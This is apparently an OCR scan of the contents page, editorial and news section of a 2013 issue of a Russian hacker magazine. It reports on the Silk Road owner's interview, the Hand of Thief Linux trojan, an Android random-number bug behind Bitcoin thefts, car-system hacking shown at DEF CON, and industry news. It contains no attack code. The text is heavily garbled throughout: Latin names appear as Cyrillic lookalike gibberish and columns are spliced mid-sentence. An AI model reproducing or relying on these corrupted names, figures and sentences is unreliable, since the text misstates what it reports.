903 эмн$пайПа 


60715711000 


т 
7 
— 
Е 
= 
О 
> 
#2 
— 
Ф 


50 


Получаем максимум 
возможностей 

с помощью консоли 
восстановления 


ТОТО 


10(177)2013 


Полный провал: 
большинство аверов 
не способны защитить 
себя от малвари 


12+ 


44 


\ААЛАЛ/.ХАКЕР.ВУ 


114 
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Каксоздавался Хабр: 
интервью с Денисом 
Крючковым 


НОВЫЕТОЧКИ СОПРИКОСНОВЕНИЯ 

История программно-определяемых радиосистем ($08) 
началась настолько не вчера, что удивительно, что именно 
сейчас произошел какой-то всплеск интереса. 

Двадцать лет назад американским военным понадо- 
билась технология, которая могла бы работать с кучей не- 
совместимых между собой систем связи. Проект назвали 
бреакЕа5у. Видимо, то, с чем столкнулись армейские гики, 
и правда было настолько секретным и настолько бардач- 
ным, раз они назвали свое детище в честь притонов вре- 
мен сухого закона. Тем не менее уже тогда удалось что-то 
сделать, однако то, что получилось, требовало для работы 
ресурсов, доступных только военным. 

Через десять лет, в начале нулевых, к проблеме обра- 
тился частный сектор. Появились первые коммуникато- 
ры, и стало ясно, что карманному устройству необходимо 
работать с а$М, Вшеюос1И и СР5, становясь при этом все 
более компактным. Компьютеры стали намного мощ- 
нее, и теперь этой проблемой смогли заняться и те, кто, 
в отличие от военных, хорошо считает деньги, — теле- 
коммуникационные компании и производители техники. 
Но для обычных смертных все эти игрушки оставались не- 
досягаемыми. 

И вот, спустя еще десять лет, это дошло и до нас с вами. 
Паззл сложился из кучи маленьких деталей. С одной сто- 
роны — золотая эра информационной безопасности. Ко- 
паться стали во всем, от промышленных систем до ави- 
ационных коммуникаций. С другой стороны — огромный 
интерес ко всему на стыке виртуального и физического, 
от 30) -печати до автоматизации и робототехники. ЗОВ — 
это еще один элемент, который сделает окружающий мир 
чуть более прозрачным и осязаемым для компьютеров. 

Однако еще большую роль сыграло и то, что в «желез- 
ный» мир все глубже проникают идеи, хорошо отработан- 
ные в софте. Уже становится понятно, что опенсорсные 
приемники НаскАР и Б!ааеНЕ сделаютс $ОВ то, что Агито 
сделал с автоматизацией, ВРерАар — с ЗО-печатью, 
а РагаЙе|!а, возможно, сделает с многопоточными вычис- 
лениями. 
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«Гики изначально предрасположены к тому, чтобы делиться друг с другом 
знаниями. У нормальных людей это так не работает» 
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КОЛОНКА СТЁПЫ ИЛЬИНА 
РВООЕ-ОЕ-СОМСЕРТ 

ПАЛЬЦЕМ В НЕБО 

ДЛЯ ВСЕХ И КАЖДОГО 

ЗОВ ЗА 10 ДОЛЛАРОВ 

НАСКВЕ: КЛЮЧ НА СТАРТ 

ВЕЧНЫЙ ТОРТ 

МА$ ДЛЯ НАС 

СОВЕЛУКОВОЕ 

ОМ$СВУРТ: ПРЯЧЕМ ОМ№$-ТРАФИК 
ВАЗРВЕВВУ Р! — НОВАЯ РЕАЛЬНОСТЬ 
МЕОСОЕЗТ-2013: ОЧНАЯ СТАВКА 
ОЦУА: НОВАЯ ЛЕГЕНДА 

НА ПЕРЕХВАТ! 

ЕАЗУ НАСК 

ОБЗОР ЭКСПЛОЙТОВ 

ГОАО БАТА, ИЛИ ПРОЧИТАТЬ ЛЮБОЙ ЦЕНОЙ 
ПРОКАЧИВАЕМ ОА 

ЗА КУЛИСАМИ $ОЕМАР 

КОЛОНКА АЛЕКСЕЯ СИНЦОВА 
СОМТЕМТ $ЕСИВИТУ РОМСУ — ОПАСНАЯ ПОЛИТИКА 
Х-ТО0Е5$ 
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ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
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Все новое за последний месяц 

Битва мозгов 

Транспортировка людей по туннелю со скоростью 1200 км/ч 

Как случилась настоящая радиореволюция 

Первое поколение доступных 5ОВ-трансиверов 

Делаем первые шаги с ВТ"Е-50В 

Первое знакомство с виновником торжества 

Интервью с создателем Хабрахабра Денисом Крючковым 

Обзор четырехдискового МАЗа ОМАРТ$-4210 

Тестирование процессора ие! Соге 15-4670К 

Дополнительная защита для параноика 

Превращаем малиновый микрокомпьютер в универсальную ретроконсоль 
Как прошел финал конкурса МеоОЧЕЗ$Т-2013 

Игровая консоль для настоящих гиков 

Как кастомизировать Апдго!@, не устанавливая патчи 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Обходим ограничение начтение файлов в МУЗОЕ 

Обзор самых интересных плагинов для популярного дизассемблера 
Знакомимся с алгоритмами для быстрого поиска 5О[-инъекций 

И снова об этичности 

Обзор нового веб-стандарта и его фундаментальных уязвимостей 


Тутилит для взлома и анализа безопасности 


Перехват и динамическое изменение НТТР-пакетов ПО для удаленного администрирования 


17 халявных антивирусов между молотом и наковальней 
Классические приемы антиотладки, которые должен знать каждый 
Делаем систему распределенных вычислений на \Ипдом$ Атиге 
Ускоряем разработку на С++ с помощью Воо$1.РУ{Поп 

Как хакеры восстанавливают забытые пароли с помощью С Зпагр 
Зряты обходил стороной этот фреймворк! 

Спецвыпуск: задачи от Криса Касперски 

Восполняем пробелы в *тх-системах 

Ускорение вычислений и выполнения заданий путем распараллеливания процессов 
Упрощаем развертывание \МИп4о\м$ 8 и \Мп4ом$ Зегуег 2012 
Поднимаем непотопляемый шлюз при помощи СААР/р5упс 
Поднимаем веб-сервер с максимальной изоляцией сервисов 
Вопросы и ответы 

8,5 Гб ВСЯКОЙ ВСЯЧИНЫ 


Удобные меб-сервисы 


МЕСАМЕ\//> — 


тИгИ@геа!.хаКер.ги 


Новость месяца 
ЕЕ 


ВИТ ЧА 


ТОГКТО СТОИТ 
ЗА ЗШЕКНОАВ 


ЖУРНАЛ РОВВЕ$ СУМЕЛ ПООБЩАТЬСЯ С ХОЗЯИНОМ ТЕНЕВОГО АНАЛОГА АМА2ОМ 


то такое Э!ЙК Роаа? Это анонимная торговая интер- 
нет-площадка, расположенная в зоне .отоп, и на- 
стоящая головная боль для властей по всему миру. 
ЗИК Воа4 работает с 2011 года, и его частенько на- 
зывают еВау’ем или Атагоп’ом криминального 
мира (вполне заслуженно). 

Именно этот сайт приводили в пример сторон- 


пил ее у прошлого владельца, на контакт с которым вышел с тру- 
дом, найдя уязвимость на тогда еще совсем молодом сайте. Тот 
баг мог привести к деанонимизации оборудования и краже битко- 
инов. Сейчас Робертс тоже весьма обеспокоен тем, что Тог далек 
от совершенства, а влияние властей на ВС становится все сильнее, 
и не совсем ясно, насколько просто или сложно будет приобрести 
криптовалюту в будущем. Он сообщил, что для анонимности поль- 


ники ЗОРА. Пожалуй, это идеальное воплощение 
зла в Интернете вообще для любого, кому это нужно. И на то 
есть достаточно веские причины. Помимо нескончаемого по- 
тока нелегальных товаров, ЭЙК Воа4 отличается еще и хоро- 
шей защитой. В качестве валюты площадка использует кри- 
товалюту Вйсот, которая может гарантировать анонимность. 
Журнал Рогое$ после нескольких месяцев бесплодных по- 
пыток сумел пообщаться с хозяином этого черного рынка, ко- 
торый известен в сети под псевдонимом из детской сказки — 
Тре Огеаа Риае Рорещ$ (Ужасный пират Робертс). Приведем 
наиболее интересные моменты разговора. 
Оказалось, что Ужасный пират Робертс не основатель 
и не первый хозяин торговой площадки. Он попросту выку- 


зователей ЗИК ВоаЯ предпринимает множество мер, но в подроб- 
ностях говорить об этом отказался. Впрочем, Робертс вместе с тем 
и превозносит Вксогт, уверяя, что криптовалюта помогает выигры- 
вать противостояние с государством. Но это как раз понятно, ведь 
если бы не ВС, ИК Воаа не было бы вовсе. «Сейчас люди способны 
контролировать потоки и распределение информации, а также де- 
нежные потоки. Сектор за сектором мы выдавливаем государство 
из этого уравнения, возвращая власть людям», — говорит Робертс. 
Наглядный пример того, как технология трансформирует общество 
и мировой порядок, что и говорить. 

Также Робертс рассказал, что взломать их пытаются постоян- 
но, ведь ИК Воаа — крупнейшая цель в Тог на сегодняшний день. 
Он назвал это даром и проклятием одновременно. 


Ежегодный оборот ЗИК Воа4 оцени- 
ваютв 14—15 миллионов долларов, 
анекоторые источники даже при- 
водят суммы в 30—45 миллионов. 
При этом биржа забирает себе около 
10% отсуммы сделок. 


«У нас вообще-то был еше проект по продаже 
оружия „Те Агтогу“, но он оказался неудач- 
ным», — говорит Робертс 


МЕСАМЕ\/$ 
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ТРОЯНЕЦ 
ДлЯ ИМУхХ 


ВИРУСОПИСАТЕЛИ НЕ ЗАБЫВАЮТ О ПОЛЬЗОВАТЕЛЯХ 
МЕНЕЕ ПОПУЛЯРНЫХ ОС 


ирусами, ориентированными на «яблочную» продукцию, 
уже никого не удивишь, хотя еще несколько лет назад миф 
о том, что на Мас’ах вирусов нет, был крепок. В наши дни 
малварь есть для всех ОС и никто не остается обиженным. 
Лишнее тому доказательство представили исследователи из компа- 
нии ВАЗА, недавно обнаружившие банковский троян Напа от Ттер, чья 
цель — пользователи Шпих. 

Специалисты ВЗА говорят, что троян уже вовсю продают на черном 
рынке, по цене примерно две тысячи долларов за копию. Притом ав- 
торы зловреда предлагают последующую поддержку и обновления. 
За три тысячи доступен набор код Напа о Тте{! плюс система для веб- 
инъекций. То есть цены примерно аналогичны ценам на малварь 
для \\Мпаом/$. Авторы уверяют, что тестировали свое детище на 15 раз- 
личных дистрибутивах (включая Убищи, Еедога и Вефап). Единствен- 
ным утешением остается тот факт, что для установки трояна на ма- 
шину жертвы нужно использовать социальную инженерию и другие 
хитрости. Пользователь должен поставить троян сам. 

Угрозу Напа оГ Ттег представляет пока исключительно для дес- 
ктопных версий Шпих. Работает он весьма традиционно: после уста- 
новки в системе жертвы перехватывает данные из веб-форм (даже 
если те передаются по НТТР$), открывает доступ к бэкдорам и пы- 
тается затруднить работу либо вовсе блокировать антивирусное 
ПО на компьютере. 


Авторы троянца уверяют, 
что Напа ом ТШМегуспешно 
перехватит данные, переда- 
ваемые какчерез НТТР, так 
ичерез НТТР$, в таких бра- 
узерах, как Епе{ох, боод!е 
Спготе, атакже в браузерах, 
заточенных исключительно 
под Мпих. 


ЧЕРЕЗ ДЫРКУВАМОНОШ 
УТЕКАЮТВС 


НЕПРИЯТНЫЙ БАГ В ГЕНЕРАТОРЕ ПСЕВДОСЛУЧАЙНЫХ ЧИСЕЛ 


есьма досадный баг обнаружили в этом месяце сразу несколько 
Вйсот-разработчиков. Проблема закралась в саму ОС Апагою, 
а именно в компонент генерации случайных чисел. Разумеет- 
ся, из-за этого уязвимость затрагивает абсолютно все Вйсот- 
программы, работающие с андроилом, да и вообще все приложе- 
ния, использующие встроенный уауа Сгуроодгарйу АгспКесиге. 

Увы, неприятную находку подтвердили и в Сбооде. Инженер по систем- 
ной безопасности Апаго4 Алекс Клюбин опубликовал официальные дан- 
ные о причинах уязвимости. Он сообщил, что «плохие» последовательности 
псевдослучайных чисел поступают также и в приложения, которые напря- 
мую обращаются к системному РАМС от Ореп35 $1 без явной инициализации 
на Апагоа. И опубликовал пример того, как приложения должны правильно 
обращаться к РАМОС, чтобы получить нормальную последовательность. 

Уже доподлинно известно о краже 55 ВТС из ВС-кошелька, сгенериро- 
ванного в Апагоа-приложении. А в Зутащес подсчитали, что уязвимости 
подвержены до 360 тысяч приложений, которые полагаются на интерфейс 
бесигеВапаот. Баг актуален для всех версий ОС. 


—> В Тм(егтеперь можно 
жаловаться на сообщения других 
пользователей и на пользователей 
вообще. Помочь в этом призвана 
новая функция Нероп Тог аризе. 


—> В декабре прошлого года 
взломать сервер, выдающий 
себя за насосную станцию в США, 
пытались китайские хакеры, со- 
общила Тгепа Мсго, проводившая 
этот опыт. 


—> Популярность Тог растет. Ра- 
нее число запросов к спискам ри- 
леев составляло порядка 50 тысяч 
в день, но после РЫЗМ и публика- 
ций в СМИ выросло до 120 тысяч. 


—> РауРа! наконец действитель- 
но заработала в России. Система 
работает с рублями, позволяет 
россиянам принимать платежи 

и выводить средства в российские 
банки. 
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НАГРАДУ ДУЯ 


ХАКЕРА СОБИРА- 
ЛИВСЕМ МИРОМ 


алестинский хакер Халил Шритех нашел уязви- 

мость в Гасебоок, позволяющую разместить за- 

пись на стене любого пользователя, даже если тот 

не находится в списке друзей. К сожалению, тех- 

поддержка социальной сети не восприняла пар- 
ня всерьез (хотя он продемонстрировал работу уязвимости), 
и хакеру пришлось пойти на крайние меры — разместить со- 
общение о баге на стене Марка Цукерберга, даже извинившись 
перед последним. 

Конечно, после такой демонстрации уже через несколь- 
ко минут с хакером связались более адекватные сотрудники 
Расебоок и разобрались с проблемой. Но вот беда — возна- 
граждения палестинцу уже не полагалось, ведь в условиях про- 
граммы вознаграждения четко обозначено, что для проверки 
«дырок» нужно использовать тестовые аккаунты, а не реальные 
страницы других пользователей (без разрешения). Такое ре- 
шение Расебоок здорово возмутило сообщество м/ПКе ваРов, 
которое не замедлило объявить сбор средств для коллеги 
на краудфандинговом ресурсе СоРипаМе. В итоге было собра- 
но более десяти тысяч долларов! 


итейпе АБоце Рвого5 Еепд5 Моге * 


РОЙоми МагК $0 деЁ №1 рус ро$Ё5 п уоиг пе\миз еед. 


АБоцЕ С КВам 
 — 


Роипдег ап СЕО а РасеБоок 
Оеаг Магк РисКегЬегд, 


Инициативу запустил 
Марк Майффрет, тех- 
нический директор ИБ- 
компании ВеуопаТги$+. 
Онжевнес вклад 

в размеретрех тысяч 
долларов. Столько же 
вложил основатель 
компании еЕуе Огока! 
Зесийу Фираз Баш- 
нак. Остальную часть 
суммы собрали с миру 
понитке. 


и ед Сотрифег 5сепсе ай Нагуаг4 УпмегзЙу Еигё зоггу Фог БгеаКтд уоцг рИ№асу ап@ роз №0 усиг мха! ‚ 1 Ваз по оег споге 0 


таке аЙвег а! {Пе героп$ | зеп +0 РасебоокК {еат . 


Иуе5 м РаЮ АКо, СаМогиа Му пате 15 КНАЦТ, Рот Раезёпе . 
... бее Моге 
Рготл ОоБЬ$ Реггу, Мел УогК 


РоШомед Бу 18,821,144 реоре 


НЕКБаМ, Т ап зоггу $ 15 поЁа Бид. ТВапК$, ЕтгаКи! 5есигй - РазеБп.сот 


И 


Хакер Эндрю Джеймс 
Миллер пытался продать доступ 
к суперкомпьютеру Национальной 
лаборатории Лоуренса за 50 тысяч сервису [ауаЬ (Ц, о чем Дотком 


долларов. Теперь умельцу грозит сообщил в ТмМЁег. 


18 месяцев тюрьмы. 


Ким Дотком и команда Меда 
готовятся запустить свою защи- 
щенную почту на смену почившему 


ТРАФИКА 
АНАЛИЗИРУЕТАНБ 


АНБ США пытается успокоить обще- 
ственность и сообщает, что анализи- 
рует лишь небольшой процент данных, 
ежедневно циркулирующих в Сети. По 
заявлению, затрагивается только 1,6% 
из 1826 Пб данных, и уточняет, что толь- 
ко 0,025% затем отбирается для ана- 
лиза. Но что в других 98,4% трафика? 
Видео, порно, торренты? 


® 


® 


12 812 7765 


НОВЫЙ РЕКОРД 
КРАУДФАНДИНГА 
ПОСТАВИЛ 
УВЕЗ ЗЕ 


—> Устройству компании Сапотса! 
удалось поставить рекорд по сбору 
средств — смартфон Убити Едаде сумел 
привлечь на сайте |пЧедодо без малого 
13 миллионов долларов. Однако этого 
оказалось недостаточно. Выяснилось, 
что Сапопса! рассчитывала на сумму 

не менее 32 миллионов долларов, так 
что смартфона, увы, не будет. 


МЕ\/$ 
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ВЗЛОМ МАШИНЫ 
ОПАСНАЯРЕАЛЬНОСТЬ 


НАОЕЕРСОМ 21 ПР 


ОДЕМОНСТРИРОВАЛИ ВЗЛОМ ДВИГАТЕЛЯ И НЕТОЛЬКО 


акер, представившийся как 207 из Саппу\ор тс Безюп, прочел на ежегодной 
конференции ОЕЕ СОМ весьма пугающий доклад о взломе автомобильных 
электронных систем. 
Группа независимых исследователей, в которую вошли 207, а также 
два именитых эксперта Чарли Миллер и Кристофер Валачек, почти год за- 
нималась изучением возможностей взлома двух популярных моделей автомобилей. Мо- 

жет быть, ты помнишь, что похожие доклады уже наделали немало шума на ОЕЕ СОМ 2010 

и 2011 годов, однако подробности тех хаков не были задокументированы и представлены 

в открытом доступе. Но на этот раз хакеры настроены более решительно. 

В самом начале презентации Миллер и Валачек признались, что они не большие ге- 
НИИ «хардверного хакинга» и от подопытной машины им нужно было лишь одно — чтобы 
та могла ехать сама. В итоге для экс- 
периментов были выбраны Тоуста Рйи$ 
2010 года и Рога Езсаре 2010 года. Авто- 
ры методики начали с того, что раньше 
взлом электронных систем в автомоби- 
лях преимущественно ограничивался 
получением доступа к информационно- 
развлекательным системам машины. 
В этом же случае речь пошла о полу- 
чении доступа к служебным системам, 
то есть тем, что отвечают за работу 
главных систем — тормозной, руле- 
вой и двигательной. Хакеры уверены, 
что в скором будущем автохаки будут 
распространены не меньше, чем сейчас 
ый | компьютерные. 

ОДЕЛ УХ 207 объяснил, что большая часть ав- 
томобильных систем построена по оди- 
наковому принципу, так что ждать 

расцвета автохаков осталось действительно недолго. Конечно, почти для всех показан- 
ных взломов необходимо получить физический доступ к автомобилю, но это почему-то 
не слишком утешает. На ВЕР СОМ продемонстрировали видео, показывающие, как можно 
заблокировать тормоза и повороты рулевого колеса, резко поддернуть ремни безопас- 
ности, помигать лампочками в салоне или фарами, посигналить и даже заглушить дви- 
гатель во время езды! Также показали манипуляции с датчиками уровня топлива в баке. 
Разумеется, такие взломы могут оказаться смертельными в самом прямом смысле этого 
слова. В том числе для машины — после одного из экспериментов Рпи$ вообще перестал 
заводиться и отправился в автосервис, где лишь удивленно развели руками и сказали, 
что не сталкивались с подобными проблемами и не уверены, что смогут починить маши- 
ну. К слову, хакеры обещают опубликовать 101 страницу документации и кода в ближай- 
шее время, так что уже можно начинать бояться. 


В то жевремя ученые из 
Бирмингемского уни- 
верситета совместно с 
голландскими крипто- 
графами разработали 
метод взлома автомо- 
бильныхиммобилайзе- 
ров, аименно системы 
Медато$ Сгурто. Ее 
использует автомо- 
бильный концерн 
УоК$мгадеп Сгочр (в 
том числе в люксовых 
моделях Аис!, ВепЧеу, 
Еатрбогопити Рогзсве). 
Концерн в судебном 
порядке запретил ис- 
следователям публи- 
ковать подробности 
овзломе. 


ТЫВРЕАСЕВООК, ДАЖЕ 
ЕСЛИ ТЕБЯ ТАМ НЕТ 


Компания РГасербоок призналась, что создавала 
«скрытые профили» для пользователей, не зареги- 
стрированных в социальной сети, и собирала данные 
о них. Гасероок уверяет, что подобное происходило 
из-за бага в официальном мобильном приложении, 
которое часто предустановленно на разных гаджетах. 


БОЛЬШЕ ПИРАГСТВА, 
БОЛЬШЕ! 


Тре Риае Вау и независимые эксперты поймали 
юридическую фирму Ргепаа Ёам на нарочитой раздаче 
пиратского контента через торрент-файлы. Юристы 
пытались поднять уровень пиратства и тем самым 
увеличить суммы компенсаций для своих клиентов. 
Судебный иск на Ргепда 1 ам/ уже подан. 


ЗАРАБОТОК НА МАЛВАРИ 
ВСЕПОПУЛЯРНЕЕ 


Исследование компании 1оскои{ Моше Зесищу 
показало, что продажа мобильной малвари в России 
становится все популярнее. «Появляются многочис- 
ленные команды-стартапы, специализирующиеся 
на подобной деятельности», — говорят в оскоц+. 
Зарабатывают такие команды 700-12 000 долларов 
в месяц. 
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ПЕРЕМЕНЫ В МСВОЗОЕГ 


СТИВ БАЛМЕР ПОКИДАЕТПОСТГЕНЕРАЛЬНОГО ДИРЕКТОРА 


последний год компанию М!сгозоН постигло множество перемен. Громкие 
увольнения начались еще зимой 2012 года со Стивена Синофски — вице-пре- 
зидента компании, который неожиданно оставил Мсго$о0й «из-за внутреннего 
конфликта», через три недели после выхода \\Мпдо\м$ 8. Затем компанию по- 
кинул Дон Меттрик, возглавлявший подразделение по разработке ХБох Опе. 
Что характерно, компанию он оставил спустя пару недель после (довольно странного) 
анонса новой консоли. Тогда же появились первые комментарии от «проверенных источни- 
ков» о том, что в компании идет глобальная реструктуризация. Подробных данных об этом 
процессе до сих пор нет, однако сообщалось, что именно перестановки внутри М!сго$ой 
побудили Меттрика уйти. 

Что за реструктуризацию проводит софтверный гигант? В июле Стив Балмер рассказал, 
что компания сокращает количество подразделений и намеревается выдвинуть на первый 
план бизнес по производству оборудования и деталей, а также интернет-услуги. По сути, 
разрозненные и зачастую конкурирующие подразделения компании сократили, объеди- 
нили и начали строить единую вертикаль. Скажем, бывшая глава подразделения \Мтао\/$ 
Джули Ларсон-Грин теперь будет руководить производством всех устройств вообще (в том 
числе ХБох и ЗиНасе). 

Во главе новой вертикали топ-менеджеров должен был закономерно оказаться Стив 
Балмер, однако в этом месяце стало известно, что в течение 12 месяцев Балмер оставит 
пост генерального директора, который он занимал с 2000 года. Это известие крайне удиви- 
ло рынок, хотя многие аналитики уверены, что Балмеру пора на покой, ведь он уже упустил 
множество ключевых моментов — планшеты, облака, мобильные устройства... «Для по- 
добных перемен не бывает удачного времени, но сейчас момент подходящий. Я исходно 
предполагал подать в отставку именно в середине нашей трансформации в „компанию 
устройств и сервисов“», — пишет Балмер. 

В компании был организован специальный комитет, в который вошел и Билл Гейтс. 
На эту группу возложена задача поиска нового главы компании. Помочь М!сго$ой в этом 
должна также маститая рекрутинговая фирма Згида/е$ |щегпайопа! шс. Кстати, одним 
из вероятных преемников вновь называют Стивена Синофски. 


«Для подобных перемен не бывает удачного 
времени, но сейчас момент подходящий», 
пишет Стив Балмер 


Также недавно стало 
известно, что Мсго5оЁ 
покупает подразде- 
ление МоК!а Вемсе$ & 
Зегмсе$ и лицензирует 
патенты и картографи- 
ческие сервисы МоКга. 
По условиям сделки 
заОемсе$ & Зегмсе$ 
компания Мисго5о Е за- 
платит3, 79 миллиарда 
евро. Ив 1,65 милли- 
ардаевро обойдутся 
лицензии напатенты 
Мока. 
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НЕМНОГО О НОСИМЫХ 
ГАДЖЕТАХ 


—> Сооде С!аз$ лишь готовят к выпуску, а очки уже 
успели запретить водителям в Великобритании. Если 
тебя поймают в С!аз$ за рулем, придется заплатить 
штраф 60 фунтов (около 90 долларов). В то же время 
полиция Калифорнии признала удачным эксперимент 
с очками-видеорегистраторами, что в ходу 

С 2012 года. 


ХРОМБУКИВРОССИЮ 


—> Юлия Соловьёва, глава российского подразде- 
ления Сооде, недавно заявила в интервью жур- 
налу Гогбез$: «Мы очень хотим привезти в Россию 
СпготеВоок$. Они очень дешевые (в Америке стоят 
150-200 долларов) и безумно быстрые. Мы еще 

не решили, с чего начнем: с розницы или крупных 
компаний». 


-ЕМО\УО ОБНОВИЛА 
ЛИНЕЙКУ ТНМКРАО 


—> Модельный ряд М/Ипао\/з-лаптопов ТИтКРаа 
обновился, они стали компактнее и легче. Также был 
увеличен трекпад и срок автономной работы. В серии 
Т появилось две 14-дюймовые модели ультрабуков — 
1440 и Т440$. Вторая может похвастаться процессо- 
ром Соге {7 и сенсорным дисплеем Рий НО. 


МЕСАМЕ\/$ 
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МТЕЕ 
ММОМ/ЗОАНО 


ПЕРВЫЙ МИНИ-КОМПЬЮТЕР | МТЕЕ ВЫПУЩЕН ПОД ОТКРЫТОЙ ЛИЦЕНЗИЕЙ 


роект ттпо\моага.ога, что функционирует «под крылом» корпорации 
|пте|, объявил о начале поставок одноплатного Ореп Нага\маге компьютера 
Мтпом/Воага. 
Плата представляет собой следующее: Мтпом/Воага оснащен 32-раз- 
рядным одноядерным процессором 1! Ают Еб40, работающим на ча- 
стоте 1 ГГц, видеоадаптером пе! СМА 600, 1 Гб оперативной памяти и 4 Мб флеш- 
памяти. Новинка поддерживает карты памяти птсго$0, подключение накопителей 
с интерфейсом ЗАТА П (3 Гбит/с), подключение УЗВ-устройств, имеет линейный ау- 
диовход/выход и поддержку локальных сетей со скоростью до 1 Гбит/с. Размер пла- 
ты 10,7 х 10,7 см. На борту этой крошки установлен дистрибутив Апазгот Ипих. Цена 
миникомпьютера — 199 долларов. 

Кроме перечисленного, можно приобрести еще и платы расширения, которые 
можно разместить над самим Мтпом/Воага, своеобразной надстройкой в несколько 
«этажей». Энтузиастам также придется по душе, что на сайте птпомюоага.ога можно 
найти любую документацию, в том числе чертежи и схемы платы. Но главное — все- 
ми этими материалами можно пользоваться в рамках открытой лицензии СгеаНуе 
Соттоп$. Одноплатные ПК на базе архитектуры 1! и раньше пользовались попу- 
лярностью в определенных кругах, а теперь все это может приобрести куда более 
массовый характер. 


Разработчики стре- 
мились создать 
набазе архитек- 
туры Ите! макси- 
мально открытый 
продукт, который 
можно легко ско- 
пировать. Поэтому 
Мтпом/Воага со- 
стоитиздовольно 
старых компонен- 
тов (процессор 
вышелещев 2010 
году) — онидешев- 
леиихлегко найти. 


ОМЕВ\УЕМ ОЕТАН $ ВЕМЕМ/$ ВЕГАТЕО 
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ЧИТАЙ, НЕ ОТВЛЕКАЙСЯ 


ОПТИМИЗИРОВАТЬ ПРОЦЕСС ЧТЕНИЯТОЖЕВОЗМОЖНО 


сть в Сети такая популярная платформа для онлай- 
нового обучения — МтаЯазй. Эти ребята предо- 
ставляют базу для разнообразных онлайновых кур- 
сов, скажем, здесь компании могут легко обучать 
своих сотрудников. И создатели МтаНазй приду- 
мали, как «проапгредить» процесс обучения. 

Система Госи$А$$1${ создана учеными из Стэнфордского 
университета и компанией Зепзюп. Авторы уверяют, что одно- 
именная функция, уже добавленная в обучающее приложение 
МтаназН под Раа, первая в своем роде, никто еще не пробовал 
использовать подобные методы в обучении. Суть проста — про- 
грамма отслеживает направление взгляда пользователя, пока 
тот, к примеру, читает текст. Если пользователь отвлекся (отвел 
глаза), Зепзюп приостановит изложение материала. Хочется 
сказать спасибо, что при этом пользователя не бьют током, «не- 
навязчиво» рекомендуя вернуться к делу :). 

Разработку также планируют применять в школах и универ- 
ситетах для повышения эффективности обучения. 


—> Популярность блокиров- 
щиков рекламы стремительно 
растет — 43% в год. Сейчас около 
30% аудитории (34% у хакер.ги) 
различных сайтов не видят рекла- 
му, сообщает РадеРан. 


—> Выложили в открытый 
доступ 1!Р-адреса почти 500 
пользователей «защищенного» 
мессенджера ВИйте$заде. Собрать 
их удалось при помощи обычной 
спам-рассылки. 


—> Согласно рейтингу Заисе 
аб$, самым ненадежным 
браузером в очередной раз при- 
знан Итегпе{ Ехр!огег. Он сбоит 
на 0,25% чаще, чем Затап, Орега, 
Спготе и Ете?ох. 


—> Интенсивность ОВо$-атак 
во втором квартале 2013 года 
составила 47,4 миллиона пакетов 
в секунду, что на 1655% больше, 
чем в 2012-м, подсчитали в Ргоехжс 
Тесппо!о9!е$. 


то МЕ\/$ 


ОБЪЕКТИВ ДЛЯ 
ЛОМОГРАФИИ 


ЕЩЕОДИН НЕОБЫЧНЫЙ И ПОПУЛЯРНЫЙ ГАДЖЕТ НА К!СК$ТАВТЕВ 


казывается, у ломографии очень много поклонни- 

ков. Ну или на планете развелось огромное количе- 

ство хипстеров, которым некуда потратить деньги :). 

Чем еще объяснить огромную популярность проекта 

по выпуску объектива Петцваля для современных 
камер? 

Небольшая справка: в 1840 году физик и математик Йозеф 
Петцваль создал упомянутый объектив. Он имеет характер- 
ный рисунок с высокой резкостью в центре кадра, спадающей 
к краям, хорошей коррекцией большинства искажений, выра- 
женной кривизной поля изображения и виньетированием. Одна 
из главных отличительных черт объектива — высокая светосила, 
которой и объясняется его популярность в портретном жанре. 

Но все это дела давно минувших дней. А современную вер- 
сию объектива Петцваля с фокусным расстоянием 85 мм и мак- 
симальной диафрагмой Е/2,2 по заказу Еотодгарпу решило 
выпустить российское предприятие — открытое акционерное 
общество «Красногорский завод им. С. А. Зверева» (произво- 
дитель камер марки «Зенит»). Проект получил на КскЗащег 
оглушительный успех, так что старым-новым объективам быть. 


Для производства 
объективанеобходимо 
было собрать 100 тысяч 
долларов, но эта от- 
метка была достигнута 
всего зачетыречаса 
посленачала сбора 
средств! В итоге же 
суммаивовсе пере- 
валилаза миллион 
триста тысяч долларов. 
Ориентировочная роз- 
ничная цена продукта — 
499 долларов. 


ататопсот 
7) 


апд уоу'те 90пе 


Атагоп наконец-то раз- 
решил доставку потребительских 
электронных товаров в Россию. 
Официально «можно» стало 
со 2 сентября текущего года. ем рынка. 


За год Арре утратила почти 
половину своей доли рынка план- 
шетов, сообщает ОС. Аналитики 
объясняют это простым насыщени- 


ИРА 
МИЛЛИОНА 
ДОЛЛАВОВ 

оос@рЕУЖЕ 
ЗАМШИАТИЛА 
ХАВЕРА\/ 


Вслед за Гасебоок компания Сооде от- 
читалась о выплатах по своим программам 
вознаграждения за найденные уязвимо- 
сти. За три года исследователи обнаружи- 
ли более 2000 багов в разных продуктах, 
за которые Соое суммарно заплатила 
уже 2 миллиона долларов вознагражде- 
ний. В среднем получилось по тысяче 
за один баг. 


5.1 = (ФФ) 


1995 


УАНОО! ПРОДАЕТ 
НЕИСПОЛЬЗУЕМЫЕ 
АККАУНТЫ 


—> На интересный шаг пошла компания 
У\апоо! — запустила сервис продажи не- 
использующихся аккаунтов. Всего за 1,99 
доллара можно подписаться на монито- 
ринг пяти любых имен и ждать, когда те 
освободятся. Напомню, что если почта 
не используется год — аккаунт считается 
недействительным. 


М ММ 9 


МЕСАМЕ\/$ 
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СКАНДАЛЫ, ИНТРИГИ, 
РАССЛЕДОВАНИЯ 
ВОООСЕЕ 


СЕМЕЙНАЯ ДРАМА БРИНА И ПОТЕРЯ 
КЛЮЧЕВОГО АМОВОШО -РАЗРАБОТЧИКА 


уть выше мы рассказывали об изменениях, постигших за последний год корпо- 
рацию Мгсгозо8, но все эти пертурбации не идут ни в какое сравнение с исто- 
рией, приключившейся недавно в боод(е. 
В конце августа стало известно, что Соое покидает вице-президент 
по управлению разработкой и выпуском операционной системы Апаго@ Хью- 
го Барра, и кто заменит его на этой должности, пока неизвестно. Барра не только один 
из ключевых Апагоа-разработчиков, он еще и одна из публичных фигур Сооде. Он регу- 
лярно появлялся на различных мероприятиях, где представлял новые продукты. Скажем, 
именно он недавно проводил презента- 
цию планшета Мехиз$ 7 второго поколения 
во время ивента в Сан-Франциско. Уходит 
Барра не в пустоту, а в китайскую компа- 
нию Х!аоптт, на должность вице-президен- 
та глобального бизнеса. Хаоп выпускает 
Апагоа-смартфоны для китайского рын- 
